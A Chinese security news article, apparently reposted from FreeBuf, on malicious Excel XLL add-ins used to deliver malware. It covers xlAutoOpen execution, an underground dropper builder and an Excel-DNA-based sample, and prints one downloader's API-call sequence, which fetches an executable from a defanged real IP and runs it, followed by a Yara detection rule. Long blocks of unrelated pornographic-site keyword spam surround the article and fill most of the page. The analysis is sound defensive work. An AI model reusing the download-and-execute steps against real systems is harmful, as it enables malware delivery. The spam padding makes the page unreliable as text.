精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

攻擊者開始使用 XLL 文件進行攻擊

安全 網(wǎng)站安全
近期,研究人員發(fā)現(xiàn)使用惡意 Microsoft Excel 加載項(XLL)文件發(fā)起攻擊的行動有所增加。

近期,研究人員發(fā)現(xiàn)使用惡意 Microsoft Excel 加載項(XLL)文件發(fā)起攻擊的行動有所增加,這項技術(shù)的 MITRE ATT&CK 技術(shù)項編號為 T1137.006。

這些加載項都是為了使用戶能夠利用高性能函數(shù),為 Excel 工作表提供 API 調(diào)用接口。與 VBA 等其他接口相比,該方式能夠更有效地擴展 Excel 的能力,使其支持更多功能,例如多線程。現(xiàn)在,攻擊者也濫用這項技術(shù)來達成自己的惡意目標。

攻擊者將帶有惡意 XLL 附件或者惡意鏈接的電子郵件發(fā)送給用戶,受害者點擊附件打開 Microsoft Excel 后會提示其安裝并激活加載項。

提示信息

攻擊者通常將代碼置于 xlAutoOpen函數(shù)中,該函數(shù)會在加載項被激活時立即觸發(fā)執(zhí)行。這意味著,與要求用戶啟用宏的 VBA 宏不同,受害者只要打開就會執(zhí)行惡意代碼。

由于 XLL 是可移植的可執(zhí)行文件,許多電子郵件網(wǎng)關(guān)都會攔截該格式的文件或者僅允許受信任簽名的加載項。

XLL 惡意軟件出售

因為 XLL 惡意文件的快速增長,我們在地下犯罪論壇上進行了相應(yīng)的調(diào)查,評估使用這種文件格式的惡意工具和服務(wù)的流行程度。

在讀個地下犯罪論壇中,反復(fù)看到來自同一個攻擊者的廣告,正在銷售一個可以創(chuàng)建 XLL Dropper 的構(gòu)建工具。

地下論壇銷售廣告

用戶指定一個可執(zhí)行文件或下載誘餌文件的鏈接地址,生成 XLL 文件。

構(gòu)建工具截圖

EXCEL-DNA 生成加載項

發(fā)現(xiàn)的 XLL 文件大部分都有相同的結(jié)構(gòu),本質(zhì)上說,XLL 文件是包含 xlAutoOpen導(dǎo)出函數(shù)的 DLL 文件。這些 XLL 文件應(yīng)該是使用 Excel-DNA工具生成的,包含多個大型的資源。

文件資源段結(jié)構(gòu)

其中包含 Excel-DNA 項目組件以及加載項,可以通過查看資源名或者同樣存儲在資源中的 XML 定義文件來識別包含 Excel 加載項的 XLL 文件。

XML 文件

包含惡意代碼的加載項是使用 .NET 開發(fā)的,位于 MODDNA資源中。要分析該惡意代碼,需要將資源保存到硬盤并使用 LZMA 算法進行解壓縮。對 .NET 文件進行反編譯后,可見 XLL 加載項的啟動函數(shù),該加載項為惡意軟件 Downloader。

.NET 文件代碼

使用 Excel-DNA 項目創(chuàng)建的 XLL 文件也可以使用項目提供的腳本自動解壓縮,該腳本將 XLL 文件的路徑作為參數(shù),然后提取、解壓縮并將資源保存到文件夾中。

提取 XLL 文件

自定義生成的加載項

其他不使用 Excel-DNA 的 XLL 文件中,一個 Downloader 大小只有 4.5 KB,但吸引了研究人員的注意。與其他 XLL 文件一樣,該文件也具有導(dǎo)出函數(shù) xlAutoOpen。為了混淆程序控制流,樣本中包含許多連續(xù)的 jmp指令。

動態(tài)調(diào)試截圖

經(jīng)過分析后,研究人員發(fā)現(xiàn)可執(zhí)行代碼后有一段加密數(shù)據(jù)。數(shù)據(jù)在循環(huán)中解密,首先確定數(shù)據(jù)的位置與大小,緊接著進行異或解密。每處理八個字節(jié),密鑰就要對用改變。

解密代碼

一旦數(shù)據(jù)被解密,樣本可以提取三個 DLL 文件名、五個 API 函數(shù)名、Payload 的 URL 以及存儲 Payload 的本地文件路徑。樣本首先通過進程環(huán)境塊(PEB)遍歷 InLoadOrderModuleList正確解析所需 DLL 的基址,然后再找到希望調(diào)用的 API 函數(shù)地址。

解析加載模塊

然后,惡意軟件使用解析后的 API 函數(shù)下載 Payload 并將其存儲執(zhí)行。在此樣本中,API 調(diào)用如下所示:

GetProcAddress(“ExpandEnvironmentStringsW”)

ExpandEnvironmentStringsW(“”%APPDATA%\joludn.exe””)

LoadLibraryW(“UrlMon”)

GetProcAddress(“URLToDownloadFile”)

URLToDownloadFile(“hxxp://141.95.107[.]91/cgi/dl/8521000125423.exe”, “C:\Users\REDACTED\AppData\Roaming\joludn.exe”)

_wsystem(“C:\Users\REDACTED\AppData\Roaming\joludn.exe”)

檢測 XLL 惡意文件的 Yara 規(guī)則為:

rule xll_custom_builder
{
meta:
description = "XLL Custom Builder"
author = "patrick.schlapfer@hp.com"
date = "2022-01-07"

strings:
str2 = "test"
op2 = { 4D 31 0E }
op4 = { 49 39 C6 }

condition:
uint16(0) == 0x5A4D and all of (op*) and filesize < 10KB
}

結(jié)論

Microsoft Excel 提供了許多合法執(zhí)行代碼的方式,如 Excel 4.0 宏、DDE 和 VBA,這些都已經(jīng)被攻擊者濫用。近期,研究人員發(fā)現(xiàn),Dridex、Agent Tesla、Raccoon Stealer 和 Formbook 等惡意軟件家族也開始利用 XLL 文件進行傳播。利用 XLL 文件攻擊的數(shù)量增長,表明攻擊者對這種技術(shù)很感興趣。

責(zé)任編輯:趙寧寧 來源: FreeBuf
相關(guān)推薦

2021-11-04 05:48:43

SSL加密攻擊勒索軟件

2022-03-05 12:00:11

網(wǎng)絡(luò)釣魚網(wǎng)絡(luò)攻擊

2014-08-20 09:44:57

2021-11-11 12:03:37

勒索軟件攻擊漏洞

2023-05-15 15:59:07

2022-02-13 23:12:34

網(wǎng)絡(luò)釣魚谷歌Google

2021-01-22 10:54:01

網(wǎng)絡(luò)攻擊Accellion F網(wǎng)絡(luò)安全

2023-04-21 19:01:55

2022-01-04 11:58:49

Docker API網(wǎng)絡(luò)攻擊文件加密

2021-03-15 13:56:00

DDoS攻擊加密貨幣

2016-01-05 15:54:32

2014-10-08 09:25:30

2023-12-19 16:31:19

2023-10-25 15:08:23

2021-04-29 09:36:23

攻擊漏洞Kubernetes

2022-08-19 15:40:08

密碼證書安全

2021-10-31 07:22:46

TikTok惡意廣告惡意軟件

2012-03-13 15:30:28

2022-03-15 11:51:33

網(wǎng)絡(luò)釣魚Intuit公司報稅軟件

2021-08-02 08:55:50

Argo網(wǎng)絡(luò)Kubernetes云集群
點贊
收藏

51CTO技術(shù)棧公眾號

国语一区二区三区| 色综合久久影院| 久久精品午夜| 亚洲精品一区二区三区影院| 2022亚洲天堂| 日本网站在线免费观看视频| 处破女av一区二区| 国产精品91免费在线| 91视频青青草| 久久99蜜桃| 日韩欧美一级二级| 超碰影院在线观看| 五月天激情在线| 国产欧美日韩另类一区| 国产不卡一区二区三区在线观看| 在线永久看片免费的视频| 91精品啪在线观看国产81旧版| 亚洲电影免费观看| 三级一区二区三区| 成人私拍视频| 亚洲.国产.中文慕字在线| 色噜噜狠狠色综合网| 手机看片福利永久| 黄页网站大全一区二区| 欧美与黑人午夜性猛交久久久| 国产探花在线免费观看| 欧美中文字幕一区二区| 亚洲电影av在线| 午夜免费福利网站| 国产一区精品福利| 一本大道综合伊人精品热热| 波多野结衣av一区二区全免费观看| av中文资源在线| www国产成人| 国产精品青青草| a级片免费视频| 另类的小说在线视频另类成人小视频在线| 97久久久久久| 日本在线免费观看| 欧美午夜免费影院| 欧美成人免费视频| 东京热无码av男人的天堂| 亚洲黄色录像| 亚洲欧美成人在线| 黄色工厂在线观看| 黄色成人美女网站| 亚洲第一天堂无码专区| zjzjzjzjzj亚洲女人| 日本少妇精品亚洲第一区| 欧美高清www午色夜在线视频| 美女网站视频黄色| 福利一区二区三区视频在线观看| 91九色02白丝porn| 北条麻妃av高潮尖叫在线观看| 26uuu亚洲电影| 色狠狠av一区二区三区| 无码无遮挡又大又爽又黄的视频| 91av亚洲| 欧美日韩一区高清| 看看黄色一级片| 亚洲图片小说区| 51精品秘密在线观看| 亚洲视频在线不卡| 天堂精品在线视频| 亚洲高清不卡av| 少妇户外露出[11p]| 午夜精品福利影院| 国产亚洲欧洲黄色| 国产乱子轮xxx农村| 这里只有精品在线| 国内精品久久久久久久久| 日本系列第一页| 快she精品国产999| 国产视频999| 亚洲成人精品女人久久久| www.av精品| 日本在线播放不卡| 黄色网页在线观看| 亚洲高清免费视频| 国产视频一区二区视频| 亚瑟国产精品| 亚洲国产欧美日韩精品| 亚洲av成人无码久久精品 | 亚洲一区二区三区高清| 国产精品电影网| 国产欧美熟妇另类久久久| 丁香六月久久综合狠狠色| 欧美伦理一区二区| 国产黄网站在线观看| 亚洲韩国精品一区| 亚洲成人福利在线观看| 亚洲不卡视频| 国产亚洲欧美日韩美女| 久久免费视频6| 水野朝阳av一区二区三区| 亚洲综合日韩中文字幕v在线| 日韩在线观看视频一区二区三区 | 任我爽在线视频精品一| 黄av在线播放| 色狠狠色噜噜噜综合网| 国产999免费视频| 日韩手机在线| 久久91亚洲精品中文字幕| 黄色av一区二区| 成人免费av网站| 在线码字幕一区| 电影网一区二区| 日韩丝袜情趣美女图片| 中文字幕第20页| 亚洲美女网站| 91亚洲永久免费精品| 久香视频在线观看| 亚洲宅男天堂在线观看无病毒| 日韩一级片播放| 欧美日韩精品一区二区三区在线观看| 久久精品中文字幕电影| 天天干天天色综合| 成人免费观看av| 黑人巨大国产9丨视频| 电影天堂国产精品| 亚洲高清免费观看高清完整版| 午夜三级在线观看| 日日夜夜免费精品视频| 久久手机视频| 182在线视频观看| 欧美一区二区三区小说| 丁香六月激情综合| 久久综合婷婷| 欧美日韩国产三区| 精品人人视频| 亚洲国产日韩欧美在线99| 亚洲一级生活片| 久久99蜜桃精品| 亚洲啪啪av| 在线看欧美视频| 亚洲欧美一区二区精品久久久| 国产午夜视频在线播放| 国产不卡在线播放| 亚洲精品天堂成人片av在线播放| 日韩三区四区| 日韩一区二区福利| 亚洲一卡二卡在线| 国产欧美精品一区二区色综合朱莉| 国产成人久久婷婷精品流白浆| 全国精品免费看| 热门国产精品亚洲第一区在线| 香蕉视频911| 欧美日韩加勒比精品一区| 亚洲av永久无码精品| 欧美午夜精品| 久久99精品国产一区二区三区| 国产激情视频在线看| 亚洲国产又黄又爽女人高潮的| 久久免费视频6| 97精品国产97久久久久久久久久久久| 成品人视频ww入口| 牛牛精品成人免费视频| 欧美专区日韩视频| 男人久久精品| 欧美日韩激情一区二区三区| 国产传媒视频在线| 狠狠色狠狠色综合| 久久久久久av无码免费网站下载| 澳门成人av| 欧美性受xxx| freemovies性欧美| 欧美乱妇23p| 免费在线视频观看| 成人av片在线观看| 日本一极黄色片| 天天影视综合| 国产精品区一区二区三在线播放| 亚洲欧美韩国| 精品国产视频在线| 国产 日韩 欧美 综合| 精品久久在线播放| 美女洗澡无遮挡| 国产在线精品国自产拍免费| 免费的一级黄色片| 嫩草影视亚洲| 亚洲精品免费网站| 18video性欧美19sex高清| 亚洲人成网站在线播| 国产精品伦一区二区三区| 亚洲综合男人的天堂| 毛片网站免费观看| 精品一区二区国语对白| 久久久久久久午夜| 三级电影一区| 久久精品日产第一区二区三区| 免费污视频在线一区| 欧美精品成人91久久久久久久| 三级黄视频在线观看| 538prom精品视频线放| 九九热精品视频在线| 亚洲天堂av一区| 欧美高清性xxxx| 国产美女一区二区| 91看片就是不一样| 亚洲欧美综合国产精品一区| 欧美中文娱乐网| 日韩中文字幕在线一区| 国产精品美女久久久久久免费 | 成人美女免费网站视频| 女人让男人操自己视频在线观看 | 亚洲一区3d动漫同人无遮挡| 国产精品黄网站| 91久久久久久久久久久| 欧美日韩免费看片| 久久久免费电影| 免费大片黄在线观看视频网站| 精品性高朝久久久久久久| 国产夫妻自拍av| 欧美色网一区二区| 亚洲日本视频在线观看| 一级特黄大欧美久久久| 日本激情视频一区二区三区| 国产午夜精品美女毛片视频| 国产伦精品一区二区三区88av| 美国毛片一区二区三区| 热久久精品国产| 性伦欧美刺激片在线观看| 不卡高清视频专区| 亚洲最新免费视频| 国产亚洲一卡2卡3卡4卡新区| 国产一区不卡在线观看| 精品一区二区三区中文字幕| 国产日韩欧美综合| 欧美日韩激情电影| 5566成人精品视频免费| 高清精品在线| 91精品国产91久久久久久不卡| 青草影视电视剧免费播放在线观看| 日韩在线观看高清| 午夜老司机在线观看| 自拍偷拍亚洲精品| √新版天堂资源在线资源| 亚洲香蕉av在线一区二区三区| 手机亚洲第一页| 精品视频久久久久久久| 无码国产色欲xxxx视频| 日韩成人av在线| 日本天堂在线| 亚洲欧洲国产伦综合| 深夜福利免费在线观看| 亚洲男人天堂2024| 黄色在线免费观看大全| 亚洲天堂av电影| yw193.com尤物在线| 伊人激情综合网| 1024视频在线| 另类色图亚洲色图| 日本aa在线| 97在线视频观看| a日韩av网址| 国产精品h片在线播放| 成人亚洲综合| 亚洲一区二区在线播放| silk一区二区三区精品视频| 国产在线资源一区| 色橹橹欧美在线观看视频高清| 欧美一区二区三区精美影视| 欧美三级伦理在线| 一区二区三区四区国产| 中文字幕免费一区二区| 免费一级淫片aaa片毛片a级| 国产精品久久久亚洲一区| 欧美黄色一级片视频| 久久99精品国产麻豆婷婷洗澡| 91人妻一区二区三区| 成人av网站在线| 最近中文字幕免费| 日韩理论片网站| 日韩精品一卡二卡| 91豆麻精品91久久久久久| 亚洲一区二区影视| 日韩精品一区二区三区视频播放| 五月天激情婷婷| 最近的2019中文字幕免费一页| 中文字幕中文字幕在线中高清免费版 | 日本黄色免费观看| 自由的xxxx在线视频| 91精品国产aⅴ一区二区| 亚洲国产精彩视频| 亚洲跨种族黑人xxx| 欧美成人hd| 91精品国产高清自在线| 黄色精品视频网站| 国产精品一区二区免费看| 精品一区av| 免费一级特黄特色毛片久久看| 丝袜美腿亚洲综合| 国产情侣久久久久aⅴ免费| 久久影院视频免费| 日韩高清dvd碟片| 色呦呦网站一区| 亚洲第一色视频| 色悠悠久久88| 欧美电影h版| av一区二区三区在线观看| 国产精品一区2区3区| 日本黄大片在线观看| 美日韩一区二区| 网站免费在线观看| 亚洲色图20p| 无码人妻一区二区三区免费 | 少妇一级淫片免费看| 日韩中文字幕在线观看| 最近高清中文在线字幕在线观看1| 亚洲一区二区中文字幕| 欧美日韩黑人| 久久久噜噜噜www成人网| 国产福利一区二区三区视频在线| 一区二区三区伦理片| 污片在线观看一区二区| 国产高中女学生第一次| 日韩在线视频二区| 国产亚洲一区二区手机在线观看 | 欧美亚一区二区| 五月婷婷开心中文字幕| 色中色综合影院手机版在线观看| 日韩精品一级毛片在线播放| 日韩黄色影视| 久久久久一区| 久久精品一区二区免费播放| 午夜精品免费在线| 亚洲精品.www| 欧美成人亚洲成人| 国产成人久久精品一区二区三区| 亚洲欧美影院| 美女mm1313爽爽久久久蜜臀| 久久精品—区二区三区舞蹈| 日韩欧美一区二区在线| 婷婷在线免费视频| 午夜精品久久久久久99热软件| 日韩亚洲精品在线观看| 一区二区三区四区免费观看| 老司机一区二区| 69夜色精品国产69乱| 欧美精品一卡两卡| 黄网站app在线观看| 成人有码在线视频| 先锋资源久久| 天天av天天操| 亚洲一区日韩| 国产精品成人观看视频免费| 国产国产精品| 17c国产在线| 亚洲欧美日韩在线不卡| 国产福利资源在线| 九九久久久久99精品| 99久久免费精品国产72精品九九 | 视频国产一区二区| 在线成人免费观看| 在线三级中文| 国产精品三区www17con| 尤物在线精品| 欧美 变态 另类 人妖| 色哟哟一区二区在线观看| 福利在线视频导航| 91精品综合视频| 黄色欧美日韩| 丰满圆润老女人hd| 欧美探花视频资源| 黄av在线免费观看| 国产精品对白刺激久久久| 亚洲欧洲日本mm| 日本一级免费视频| 欧美另类变人与禽xxxxx| 中文字幕伦理免费在线视频| 俄罗斯精品一区二区| 夜夜嗨网站十八久久| 在线不卡av电影| 欧美日本韩国一区| 麻豆福利在线观看| 久久一区二区精品| 美女www一区二区| 久久久一二三区| 亚洲日韩中文字幕| 91成人app| 国产黄页在线观看| 国产精品国产自产拍高清av| 超碰福利在线观看| 日本在线观看天堂男亚洲| 欧美电影三区| 国产精品久久久久久久无码| 欧美中文字幕一区| 黑人玩欧美人三根一起进| 日韩理论片在线观看| 国产福利精品一区二区| 国产一级淫片a视频免费观看| 北条麻妃99精品青青久久| 国产图片一区| 成人性生交免费看| 五月综合激情婷婷六月色窝| 亚洲精品传媒| 欧美中日韩免费视频| 国产成人在线看| 中文字幕二区三区| 午夜精品理论片|